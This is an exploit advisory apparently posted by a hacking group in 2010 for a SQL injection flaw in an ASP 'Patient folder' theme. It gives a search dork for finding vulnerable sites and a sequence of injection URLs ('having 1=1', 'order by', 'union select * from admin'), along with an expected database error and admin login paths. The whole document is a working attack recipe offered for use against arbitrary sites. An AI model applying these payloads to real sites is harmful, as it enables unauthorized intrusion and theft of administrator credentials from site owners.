============================================================ Patient folder (THEME ASP) Local SQL Injection Vulnerability ============================================================ ----------------------------------- By: SA H4x0r - Emails: ww0@hotmail.com - Date: 2010/05/31 - ----------------------------------- ===================================================================== Search: "profil.asp?id=" OR "asp?id=" Author: SA H4x0r Contact: ww0[at]hotmail.com Data: 2010-05-31 ===================================================================== Description: Inject script asp to tell the script to take them infected .. ===================================================================== --=[ Vuln C0de ]=- [-] com/profil.asp?id [-] xxx/xxxxxx.asp?id ----------------------------------------------------------------------------------------- Directions: http://[Site].com/profil.asp?id=1' <<< To show us the site involved or not http://[Site].com/profil.asp?id=1 having 1=1 << Here is a guide on the site downstream Look: [Microsoft][ODBC Microsoft Access Driver] HAVING clause (1=1) without grouping or aggregation. okey ;) http://[Site].com/profil.asp?id=1 order by 1 http://[Site].com/profil.asp?id=1 union select * from admin Control panel: http://[Site].com/admin "OR" http://[Site].com/login ----------------------------------------------------------------------------------------- -=[ P0C ]=- http://127.0.0.1/profile/profil.asp?id=[SQL ASP] http://127.0.0.1/.asp?id=[SQL ASP] =========================| -=[ E0F ]=- |========================= Gr33t'z; Dmar Skood - VirUs_Ra3ch - Mr_QlQ - v4 Team - XP10_HackEr